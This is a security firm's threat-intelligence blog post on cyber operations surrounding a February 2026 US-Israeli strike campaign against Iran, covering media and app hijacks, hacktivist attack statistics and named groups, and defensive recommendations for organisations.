Introduction
On February 28, 2026, the United States and Israel launched Operation Roaring Lion, the joint military campaign against Iranian military, nuclear, and government targets. Within hours, fighter jets and cruise missiles were striking IRGC command centers across the country. But the assault was not limited to the physical world.
In parallel, Iran plunged into a near-total digital blackout. Internet connectivity collapsed to just 4% of normal traffic. Government services, news platforms, security communications, and mobile apps failed across major cities. Pro-regime news sites were injected with PSYOPS content. A prayer app with over 30 million installations was hijacked to send surrender messages to soldiers. State television satellite feeds were replaced with speeches by Trump and Netanyahu.
For organizations worldwide, the takeaway is urgent: cyber warfare is no longer a sideshow to conventional conflict. It is a primary theatre of operations, and its consequences spill across borders.
A Decade of Cyber Escalation
This did not start in 2026. The roots trace back to Stuxnet (2010), the US-Israeli cyberweapon that physically destroyed Iranian nuclear centrifuges at Natanz. Iran responded by building offensive cyber capabilities under the IRGC, launching attacks against US financial institutions (Operation Ababil, 2012–2014), Saudi Aramco, and more recently, water utilities across the United States.
The June 2025 Twelve-Day War marked the moment cyber operations became fully integrated with kinetic strikes. Cyberattacks surged 700% within 48 hours. Predatory Sparrow wiped Bank Sepah’s data and burned $90 million in stolen Nobitex cryptocurrency. Over 100 pro-Iranian hacktivist groups mobilized on Telegram. Israel was the most targeted country by geopolitically motivated hackers in 2025, absorbing 12.2% of all global attacks.
By February 2026, with Iran’s conventional military options severely degraded, cyber became the regime’s sole remaining instrument of asymmetric retaliation and simultaneously the most devastating weapon used against it.
February 28, 2026: The Cyber Front
The cyber operations accompanying the strikes were notable for their speed, coordination, and psychological sophistication. Here is what we observed:
1. Pro-Regime News Agencies Compromised
Facts:
Within the first hours of the strikes, multiple popular pro-regime Iranian news agencies were simultaneously compromised. Legitimate-looking but fabricated content was injected into their front pages, designed to degrade morale of pro-regime forces using classic PSYOPS tactics. The sites were quickly taken down and restored, but not before reaching a wide audience during the most critical early hours.
Analysis:
By injecting content at the exact moment Iranians turned to state media for strike coverage, the attackers maximized psychological impact during the regime’s most vulnerable window. The simultaneous compromise of multiple outlets suggests pre-positioned access – these intrusions were prepared well in advance and activated on cue.
2. BadeSabaa Prayer App Hijacked
Facts:
Shortly after, BadeSabaa, a popular Iranian prayer time app with over 30+ million installations from the Iranian app store, was hijacked. Push notifications were sent to its entire user base, calling on army members to surrender and join the people if they wanted to survive.
ZENDATA Technical Insight: The Hidden Risk in BadeSabaa
The target selection was precise. As a prayer time app, its users skew heavily religious and conservative (a demographic overlapping significantly with pro-regime supporters and military personnel). But the deeper concern is technical: the app requires location access to provide accurate prayer times, and most users would have granted this permission. If the backend was compromised deeply enough to send push notifications, it is reasonable to assume that telemetry logs, location data, and unique device identifiers were also exposed. Correlating this data across 30 million users opens significant intelligence possibilities from tracking military personnel movements to identifying force concentrations. Not that this has necessarily been the case, but the potential is remarkable.
Note: Rumors circulated that EITAA, Iran’s popular domestic messaging app, was also taken down. ZENDATA verified that this was not the case and EITAA remained accessible.
3. Nationwide Internet Blackout
Facts:
Iran went into full internet blackout, initially starting from MCI and expanding nationwide within approximately a day. This appears to be a self-imposed shutdown by Iranian authorities, not the result of an external cyberattack.
Analysis:
This is likely a multi-purpose measure: containing public exposure to the impact of strikes, attempting denial of service to smaller drone guidance systems (a tactic that proved ineffective during the June 2025 war), and maintaining a veil over potential crackdowns on civilian protests. A small number of hosts remained accessible from outside Iran. Interestingly, comparing current accessibility data with logs from previous blackout periods reveals notable discrepancies in what remains reachable and what does not. The internet kill switch remains a double-edged sword: it denies intelligence to the adversary but also cripples internal coordination, economic activity, and public trust.
4. National TV Satellite Hijack
Facts:
During the second day of strikes, Iranian national television’s Channel 3 satellite streams on IntelSat were hijacked (the second such incident since the recent wave of protests). Viewers were shown video broadcasts of speeches by Donald Trump and Benjamin Netanyahu instead of regular programming.
Analysis:
Satellite broadcast hijacking directly penetrates the regime’s most controlled information channel. For viewers accustomed to managed state media, seeing enemy leaders on their national channel reinforces the narrative that the regime has lost control. The recurrence suggests the IntelSat relay vulnerability has not been remediated, or is being re-exploited through different vectors.
Other covert cyber operations are believed to be ongoing. We will update this analysis as additional incidents are confirmed.
The Hacktivism Surge: Pro-Iranian Groups in Overdrive
Beyond the state-level operations described above, the conflict has triggered a massive surge in hacktivist activity, predominantly from pro-Iranian and pro-Palestinian groups. While most of these operations are low in sophistication, their sheer volume and coordinated timing create real noise, consume defender resources, and serve as a force multiplier for the psychological dimension of the conflict.
A Dramatic Shift in Targeting
The statistics tell a stark story. Over the last 6 months, the global distribution of cyber incidents reflected broader threat trends: the United States led with 18% of all incidents, followed by India (6%), Israel (6%), Indonesia (5%), and Thailand (5%). But in the last 24 hours since the February 28 strikes, the picture has shifted dramatically:
| Rank | Last 6 Months | % | Last 24 Hours | % |
|---|---|---|---|---|
| 1 | USA (4,239) | 18% | Israel (45) | 21% |
| 2 | India (1,504) | 6% | USA (26) | 12% |
| 3 | Israel (1,330) | 6% | UAE (21) | 10% |
| 4 | Indonesia (1,186) | 5% | Kuwait (16) | 7% |
| 5 | Thailand (1,143) | 5% | Saudi Arabia (12) | 5% |
Source: Threat intelligence monitoring, March 1–2, 2026
Israel jumped from 6% to 21% of global incidents in just 24 hours – a 3.5x increase. Crucially, Gulf states – UAE, Kuwait, and Saudi Arabia – appeared in the top 5 for the first time, reflecting retaliatory and spillover targeting linked to their proximity to the conflict and hosting of US military assets.
What the Attacks Look Like
Analysis of 179 recent threat incidents paints a clear picture of the hacktivist playbook:
| Attack Type | Count | Example Targets |
|---|---|---|
| DDoS Attacks | 67 | Israel Defense Forces, Union Bank of Israel, Israel Innovation Authority, Archive of Our Own |
| Alerts / Threat Claims | 36 | AnonGhost, 313 Team, Cyber Isnaad Front claiming US/Israel/Gulf targets |
| Data Leaks / Breaches | 25 | Israeli MoD, IDF military database, Israeli civilians, eBay |
| Website Defacement | 19 | Israeli and Gulf government sites, corporate websites |
| Ransomware | 18 | US cities, schools, industrial companies (Qilin, INC RANSOM) |
| Initial Access Sales | 9 | CCTV systems, SCADA/PLC, RDWeb access in USA |
DDoS attacks dominate at 37% of all incidents, consistent with hacktivist preference for high-visibility, low-effort disruption. But the data also reveals more concerning activity: 9 incidents involving initial access sales (including CCTV systems and SCADA/PLC access in the US), alleged breaches of Israeli Defense Forces servers and Ministry of Defense data, and targeted data leaks of military personnel and civilian information.
The Groups Behind It
The hacktivist ecosystem active in the last 48 hours includes a mix of established and emerging groups:
- RipperSec – most active group in the dataset, repeatedly targeting Israeli government bodies like the Israel Innovation Authority and Export Institute.
- DieNet – focusing DDoS campaigns on US targets.
- 313 Team / UniT 313 – claiming broad multi-country targeting including Israel, USA, Saudi Arabia, UAE, Jordan, and Kuwait.
- Dark Storm Team – targeting Israeli banking (Union Bank of Israel) and Western platforms.
- APT IRAN – a self-styled APT group conducting operations against Israeli infrastructure.
- Conquerors Electronic Army, Cyber Islamic Resistance-Axis, Cyber Isnaad Front – groups explicitly aligning with Iranian/Axis of Resistance narratives.
- AnonGhost, BD Anonymous, BABAYO EROR SYSTEM – declaring simultaneous targeting of Israel and the USA.
ZENDATA Assessment: Noise vs. Signal
The majority of these hacktivist operations are low-to-medium sophistication: DDoS floods, recycled data leaks, website defacements, and exaggerated claims. Many groups inflate their impact for media attention and Telegram credibility. However, this noise should not be dismissed. It consumes security team bandwidth, distracts from more advanced threats, and occasionally includes genuinely dangerous activity like SCADA/PLC access in US infrastructure and military data breaches. The key question is always which hacktivist front is actually a state-sponsored “faketivist” operation. Analysis of 250,000+ Telegram messages from 178 groups during the 2025 conflict revealed coordination patterns inconsistent with organic activism.
Key Cyber Actors
| Side | Key Actors | Notable Operations |
|---|---|---|
| Pro-Israel | Predatory Sparrow, Unit 8200, US Cyber Command | Bank Sepah data wipe, $90M Nobitex crypto burn, state TV hijack, GPS jamming, Feb 2026 total blackout |
| Pro-Iran | Handala, RipperSec, DieNet, 313 Team, Dark Storm Team, APT IRAN, CyberAv3ngers, APT33/34/42 | DDoS campaigns, data leaks, SCADA/PLC exploitation, website defacement, military data breaches, Shamoon 4.0 |
What This Means for Your Business
Even without direct Middle East exposure, the cyber spillover from this conflict creates tangible risks. Iran’s conventional military is degraded; cyber is its primary remaining retaliation tool. Iranian APT groups have a documented history of targeting energy, finance, defense, and water utilities in the US, Europe, and the Gulf. Meanwhile, opportunistic cybercriminals exploit geopolitical chaos with conflict-themed phishing, malicious links disguised as breaking news, and ransomware timed to organizational distraction.
The hacktivist data confirms this: the US is the second most targeted nation in the last 24 hours, and incidents include attempted access to surveillance cameras, SCADA/PLC systems, and RDWeb portals across American organizations. Gulf states are also seeing unprecedented targeting.
Recommendations
Immediate Actions
- Activate and scale DDoS protection. Pro-Iranian groups favor high-volume DDoS as their primary weapon.
- Audit internet-facing OT/ICS systems. Iranian actors specifically target industrial control systems and PLCs. Disable non-essential exposed services.
- Issue targeted phishing alerts warning employees about conflict-themed lures and urgency-based social engineering.
- Enforce MFA everywhere. Iranian groups use MFA push-bombing – flooding users with login requests until one is accepted.
- Rotate credentials for systems connected to energy, defense, government, or financial sectors.
Medium-Term (Next 30 Days)
- Adopt zero-trust architecture. Micro-segment networks to prevent lateral movement from a single compromised endpoint.
- Implement immutable offline backups. Wiper malware – Iran’s weapon of choice since Shamoon in 2012 – makes recovery impossible without clean backups.
- Hunt proactively. Iranian APTs use “living-off-the-land” techniques, leveraging legitimate admin tools to avoid detection.
- Assess supply chain exposure. If your vendors operate in the Middle East or use Israeli-made OT equipment, their risk is your risk.
A Note on CISA Capacity
The US Cybersecurity and Infrastructure Security Agency has been operating with sharply reduced staffing due to a DHS funding lapse. Organizations should not rely solely on government alerts and should invest in their own threat intelligence and incident response capabilities.
Conclusion
The February 2026 escalation makes one thing unmistakable: cyber warfare is a primary theatre of modern conflict. The operations we observed combine technical sophistication – pre-positioned infrastructure compromise, satellite hijacking, AI-driven targeting – with deep psychological strategy: exploiting prayer apps, injecting PSYOPS at peak attention moments, and engineering nationwide information blackouts.
The hacktivist dimension adds another layer: over 170 groups flooding targets with DDoS, defacements, and data leaks, while more sophisticated actors probe critical infrastructure. The line between independent hacktivism and state-sponsored operations is deliberately blurred, making attribution – and proportional response – increasingly difficult.
For organizations worldwide, the threat environment has fundamentally shifted. State-sponsored actors with proven capabilities are operating with reduced restraint and increased motivation. The companies and institutions that invested in defense-in-depth, zero-trust, and proactive threat hunting will weather this storm. Those that deferred these investments are now exposed.
ZENDATA’s Threat Intelligence Unit continues to actively monitor this conflict and will update this analysis as events develop. If your organization needs support with threat assessment, incident response, or infrastructure hardening, contact us at info@zendata.security or call our 24/7 hotline at +41 22 588 65 90.
